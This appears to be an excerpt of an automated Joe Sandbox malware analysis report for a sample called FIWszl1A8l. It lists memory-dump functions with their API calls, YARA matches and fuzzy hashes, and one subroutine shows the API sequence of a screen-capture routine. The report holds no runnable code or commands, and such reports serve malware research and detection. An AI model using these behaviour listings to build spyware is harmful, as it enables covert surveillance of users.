                                                                                                  • Opcode ID: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
                                                                                                  • Instruction ID: f3ca6273cb5cf878ae5635d7451ba58b3450429b0902bef3cbcc538218de26ea
                                                                                                  • Opcode Fuzzy Hash: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
                                                                                                  • Instruction Fuzzy Hash: DF01C43DD02630E7DB22EF68884878977A1BF04750F654145E804F32A0CB346986CFD6
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 03FB8B4C
                                                                                                    • Part of subcall function 03FB8116: __getptd_noexit.LIBCMT ref: 03FB8119
                                                                                                    • Part of subcall function 03FB8116: __amsg_exit.LIBCMT ref: 03FB8126
                                                                                                  • __amsg_exit.LIBCMT ref: 03FB8B6C
                                                                                                  • __lock.LIBCMT ref: 03FB8B7C
                                                                                                  • _free.LIBCMT ref: 03FB8BAC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170801528-0
                                                                                                  • Opcode ID: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
                                                                                                  • Instruction ID: 3f441f88208e81df2ddcef5bf29c1eda7f59e1a869865b7a8b1f80488f54fab7
                                                                                                  • Opcode Fuzzy Hash: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
                                                                                                  • Instruction Fuzzy Hash: 15015EF9D017A2EBDB21EF768C447D9B778EB44790F598045E8106B390C7345982CBD6
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(02D04FB5,02D04E55,02D042BE,00000000,?,?,02D04E55,?,?,?,?,00000000,000000FF), ref: 02D041E8
                                                                                                  • LeaveCriticalSection.KERNEL32(02D04FB5,?,?,?,00000000,000000FF), ref: 02D041F6
                                                                                                  • LeaveCriticalSection.KERNEL32(02D04FB5), ref: 02D04257
                                                                                                  • SetEvent.KERNEL32(8520468B), ref: 02D04272
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$EnterEvent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3394196147-0
                                                                                                  • Opcode ID: dd1eefdbc4331c7cc234f2298badd5d655a9815ea505edbaa1ace0b02fc8b372
                                                                                                  • Instruction ID: 48c47ae716f8ed8c4135f8d837ea218bccd39514737e99729c7cbc574cb390f1
                                                                                                  • Opcode Fuzzy Hash: dd1eefdbc4331c7cc234f2298badd5d655a9815ea505edbaa1ace0b02fc8b372
                                                                                                  • Instruction Fuzzy Hash: 0111F2B0A01B019FD724CF74D588A96B7E9BF4C300B55C92DE95A8B351EB31E905CB00
                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM(00000001,?,00000001,?,02D03C4F,?,?,00000001), ref: 02D04B15
                                                                                                  • InterlockedIncrement.KERNEL32(00000001), ref: 02D04B24
                                                                                                  • InterlockedIncrement.KERNEL32(00000001), ref: 02D04B31
                                                                                                  • timeGetTime.WINMM(?,02D03C4F,?,?,00000001), ref: 02D04B48
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: IncrementInterlockedTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 159728177-0
                                                                                                  • Opcode ID: ce94813d5c8c3a849df554321bf1737643e3186c65841f5bbba3dba2ed6808e8
                                                                                                  • Instruction ID: b1f670b568d1b1eca10328443e12f6bb346e19312be9be147f9ae69031daf9cf
                                                                                                  • Opcode Fuzzy Hash: ce94813d5c8c3a849df554321bf1737643e3186c65841f5bbba3dba2ed6808e8
                                                                                                  • Instruction Fuzzy Hash: C101C8B1A007059FC720DF6AD880A4AFBF9EF58750741892EE549C7710E775E9448FA0
                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM(00000001,?,00000001,?,00973C4F,?,?,00000001), ref: 00974AF5
                                                                                                  • InterlockedIncrement.KERNEL32(00000001), ref: 00974B04
                                                                                                  • InterlockedIncrement.KERNEL32(00000001), ref: 00974B11
                                                                                                  • timeGetTime.WINMM(?,00973C4F,?,?,00000001), ref: 00974B28
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: IncrementInterlockedTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 159728177-0
                                                                                                  • Opcode ID: f9e477645368bb216446725c9d1d65551c10964ce99969a50b57358bd26b2169
                                                                                                  • Instruction ID: d22eba59fbf4ee35f5a7028e9ffe64195589803010066b0c27cc56c0a1f5b2fb
                                                                                                  • Opcode Fuzzy Hash: f9e477645368bb216446725c9d1d65551c10964ce99969a50b57358bd26b2169
                                                                                                  • Instruction Fuzzy Hash: 82010C716007049FC720EF7AD88094AF7E9AF58650701892AE54DC7611E774E5448F90
                                                                                                  APIs
                                                                                                  • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02D03667
                                                                                                  • _free.LIBCMT ref: 02D0369C
                                                                                                    • Part of subcall function 02D0F639: RtlFreeHeap.NTDLL(00000000,00000000,?,02D13E4C,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F64F
                                                                                                    • Part of subcall function 02D0F639: GetLastError.KERNEL32(00000000,?,02D13E4C,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000), ref: 02D0F661
                                                                                                  • _malloc.LIBCMT ref: 02D036D7
                                                                                                  • _memset.LIBCMT ref: 02D036E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3340475617-0
                                                                                                  • Opcode ID: 963db20f15fe977f31f5b2484ad4db0c699d664d64b55234e7474a14d357bb2e
                                                                                                  • Instruction ID: 38e96cf56d87582218c978f8de74e4b5629e9caec6f6236853da9b6149e751bd
                                                                                                  • Opcode Fuzzy Hash: 963db20f15fe977f31f5b2484ad4db0c699d664d64b55234e7474a14d357bb2e
                                                                                                  • Instruction Fuzzy Hash: C2011AF0900B40DFE3609F7A98C1B97BAE9EB85304F50482EE5AE83701CA30AC05CF20
                                                                                                  APIs
                                                                                                  • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00973667
                                                                                                  • _free.LIBCMT ref: 0097369C
                                                                                                    • Part of subcall function 00976E49: HeapFree.KERNEL32(00000000,00000000,?,00979900,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 00976E5F
                                                                                                    • Part of subcall function 00976E49: GetLastError.KERNEL32(00000000,?,00979900,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000), ref: 00976E71
                                                                                                  • _malloc.LIBCMT ref: 009736D7
                                                                                                  • _memset.LIBCMT ref: 009736E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3340475617-0
                                                                                                  • Opcode ID: d7af785c08cbcc32cda3bcc952e289c14862227343d5696597fd298bc903171e
                                                                                                  • Instruction ID: 428212f69c6497a7902c07e6f75722af52cb56ab91317f89c909155d467b44cb
                                                                                                  • Opcode Fuzzy Hash: d7af785c08cbcc32cda3bcc952e289c14862227343d5696597fd298bc903171e
                                                                                                  • Instruction Fuzzy Hash: F201DEF5900B04DFE3209F7AD881B97BAE8EF85314F11882EE5AE83302D63169048F60
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00926F08
                                                                                                    • Part of subcall function 00926E5A: __FF_MSGBANNER.LIBCMT ref: 00926E73
                                                                                                    • Part of subcall function 00926E5A: __NMSG_WRITE.LIBCMT ref: 00926E7A
                                                                                                  • std::exception::exception.LIBCMT ref: 00926F3D
                                                                                                  • std::exception::exception.LIBCMT ref: 00926F57
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00926F68
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2388904642-0
                                                                                                  • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                  • Instruction ID: 6e6c65b8fee333ca83a3e09d36c3609520d59431495f8cb1687d54c44773da0c
                                                                                                  • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                  • Instruction Fuzzy Hash: AFF02831404279A7DF00EBA4FC85BAD7AF9EB81304F140058F424AA4DADFB1CAC08750
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0282F0E0
                                                                                                    • Part of subcall function 0282F032: __FF_MSGBANNER.LIBCMT ref: 0282F04B
                                                                                                    • Part of subcall function 0282F032: __NMSG_WRITE.LIBCMT ref: 0282F052
                                                                                                  • std::exception::exception.LIBCMT ref: 0282F115
                                                                                                  • std::exception::exception.LIBCMT ref: 0282F12F
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0282F140
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2388904642-0
                                                                                                  • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                  • Instruction ID: 61fb881e2658eeaa18c94c1d8b444298621201e74bc56865f01437fe6b759ac9
                                                                                                  • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                  • Instruction Fuzzy Hash: 42F02D7D4002386BDB15EB58DC14ABE7BBAEB50744FD0406DD504D64D0DB718A85CF92
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 03FB39DC
                                                                                                    • Part of subcall function 03FB392E: __FF_MSGBANNER.LIBCMT ref: 03FB3947
                                                                                                    • Part of subcall function 03FB392E: __NMSG_WRITE.LIBCMT ref: 03FB394E
                                                                                                  • std::exception::exception.LIBCMT ref: 03FB3A11
                                                                                                  • std::exception::exception.LIBCMT ref: 03FB3A2B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 03FB3A3C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2388904642-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D01420: HeapFree.KERNEL32(?,00000000,?,?,?,02D040B1,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D0143D
                                                                                                    • Part of subcall function 02D01420: _free.LIBCMT ref: 02D01459
                                                                                                  • HeapDestroy.KERNEL32(00000000), ref: 02D0CD93
                                                                                                  • HeapCreate.KERNEL32(?,?,?), ref: 02D0CDA5
                                                                                                  • _free.LIBCMT ref: 02D0CDB5
                                                                                                  • HeapDestroy.KERNEL32 ref: 02D0CDE2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Destroy_free$CreateFree
                                                                                                  • String ID:
                                                                                                  • API String ID: 4097506873-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00971420: HeapFree.KERNEL32(?,00000000,?,?,?,009740B1,?,00000000,00974039,?,76F8DFA0,00973648), ref: 0097143D
                                                                                                    • Part of subcall function 00971420: _free.LIBCMT ref: 00971459
                                                                                                  • HeapDestroy.KERNEL32(00000000), ref: 009764A3
                                                                                                  • HeapCreate.KERNEL32(?,?,?), ref: 009764B5
                                                                                                  • _free.LIBCMT ref: 009764C5
                                                                                                  • HeapDestroy.KERNEL32 ref: 009764F2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Destroy_free$CreateFree
                                                                                                  • String ID:
                                                                                                  • API String ID: 4097506873-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                  • String ID:
                                                                                                  • API String ID: 865245655-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                  • String ID:
                                                                                                  • API String ID: 865245655-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                  • String ID:
                                                                                                  • API String ID: 865245655-0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc
                                                                                                  • String ID: &
                                                                                                  • API String ID: 845055658-3042966939
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc
                                                                                                  • String ID: &
                                                                                                  • API String ID: 845055658-3042966939
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset_wcsrchr
                                                                                                  • String ID: D
                                                                                                  • API String ID: 1675014779-2746444292
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset_wcsrchr
                                                                                                  • String ID: D
                                                                                                  • API String ID: 1675014779-2746444292
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D0BC70: GetDesktopWindow.USER32 ref: 02D0BC8F
                                                                                                    • Part of subcall function 02D0BC70: GetDC.USER32(00000000), ref: 02D0BC9C
                                                                                                    • Part of subcall function 02D0BC70: CreateCompatibleDC.GDI32(00000000), ref: 02D0BCA2
                                                                                                    • Part of subcall function 02D0BC70: GetDC.USER32(00000000), ref: 02D0BCAD
                                                                                                    • Part of subcall function 02D0BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 02D0BCBA
                                                                                                    • Part of subcall function 02D0BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 02D0BCC2
                                                                                                    • Part of subcall function 02D0BC70: ReleaseDC.USER32(00000000,00000000), ref: 02D0BCD3
                                                                                                    • Part of subcall function 02D0BC70: GetSystemMetrics.USER32(0000004C), ref: 02D0BD78
                                                                                                    • Part of subcall function 02D0BC70: GetSystemMetrics.USER32(0000004D), ref: 02D0BD8D
                                                                                                    • Part of subcall function 02D0BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 02D0BDA6
                                                                                                    • Part of subcall function 02D0BC70: SelectObject.GDI32(?,00000000), ref: 02D0BDB4
                                                                                                    • Part of subcall function 02D0BC70: SetStretchBltMode.GDI32(?,00000003), ref: 02D0BDC0
                                                                                                    • Part of subcall function 02D0BC70: GetSystemMetrics.USER32(0000004F), ref: 02D0BDCD
                                                                                                    • Part of subcall function 02D0BC70: GetSystemMetrics.USER32(0000004E), ref: 02D0BDE0
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • _memset.LIBCMT ref: 02D0B1E1
                                                                                                  • swprintf.LIBCMT ref: 02D0B204
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                                  • String ID: %s %s
                                                                                                  • API String ID: 1028806752-581060391
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D09115
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF4E
                                                                                                    • Part of subcall function 02D0EF39: __CxxThrowException@8.LIBCMT ref: 02D0EF63
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF74
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D09128
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                  • String ID: string too long
                                                                                                  • API String ID: 963545896-2556327735
                                                                                                  • Opcode ID: 0a3534205a400d303b695cafb60f61a50b261ed5054771f0e8ae0175edf9ea8d
                                                                                                  • Instruction ID: 7d28704062c204baf31be3f223747e9943bb5728f64ebeca900f23bafc65ef77
                                                                                                  • Opcode Fuzzy Hash: 0a3534205a400d303b695cafb60f61a50b261ed5054771f0e8ae0175edf9ea8d
                                                                                                  • Instruction Fuzzy Hash: EF1193753443508BD3218E2CE894B56BBE5EBE5A21F100A6AE191877E2C7B1DC05C7B6
                                                                                                  APIs
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 02D0941D
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D0944A
                                                                                                  Strings
                                                                                                  • invalid string position, xrefs: 02D09445
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                  • String ID: invalid string position
                                                                                                  • API String ID: 3614006799-1799206989
                                                                                                  • Opcode ID: 43c81e12d1d17a02cd06da4a084e3da6a66a0dcbedfea201f2c8b497c3988773
                                                                                                  • Instruction ID: c559b1273c0f216d9add50862951d89e0e4162fb972c3b900f7019a365a17c70
                                                                                                  • Opcode Fuzzy Hash: 43c81e12d1d17a02cd06da4a084e3da6a66a0dcbedfea201f2c8b497c3988773
                                                                                                  • Instruction Fuzzy Hash: F401F2322002105BD324AE68E8D4BCAF796EB40B24F140A29E1568B7D1D771ED448BA4
                                                                                                  APIs
                                                                                                  • __output_l.LIBCMT ref: 00926FFC
                                                                                                    • Part of subcall function 009270E4: __getptd_noexit.LIBCMT ref: 009270E4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__output_l
                                                                                                  • String ID: B
                                                                                                  • API String ID: 2141734944-1255198513
                                                                                                  • Opcode ID: 4ea230d637fa5764a43ecdf8be00f7d262e1573a93248e79ca2350081dd71a3f
                                                                                                  • Instruction ID: 52b35581961c929a436d9042d021fbdb195ca41707b9c2a3b15b75da8fbd702a
                                                                                                  • Opcode Fuzzy Hash: 4ea230d637fa5764a43ecdf8be00f7d262e1573a93248e79ca2350081dd71a3f
                                                                                                  • Instruction Fuzzy Hash: 5301AD7290422D9BDF009FA4EC01BEEBBF8FB48364F000115F924B6285E7749504CBA1
                                                                                                  APIs
                                                                                                  • __output_l.LIBCMT ref: 0282F1D4
                                                                                                    • Part of subcall function 0282F2DA: __getptd_noexit.LIBCMT ref: 0282F2DA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__output_l
                                                                                                  • String ID: B
                                                                                                  • API String ID: 2141734944-1255198513
                                                                                                  • Opcode ID: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                  • Instruction ID: 1988ccaa2bd081d710fd251cf95836add5c89c7750c1847e36ffce4ee71a1f37
                                                                                                  • Opcode Fuzzy Hash: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                  • Instruction Fuzzy Hash: 6C016D79E002699BDF119FA8CC00BEEBBF5EB04364F504215E928E6280D7749555CFB2
                                                                                                  APIs
                                                                                                  • __output_l.LIBCMT ref: 02D0F815
                                                                                                    • Part of subcall function 02D0F91B: __getptd_noexit.LIBCMT ref: 02D0F91B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__output_l
                                                                                                  • String ID: B
                                                                                                  • API String ID: 2141734944-1255198513
                                                                                                  • Opcode ID: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
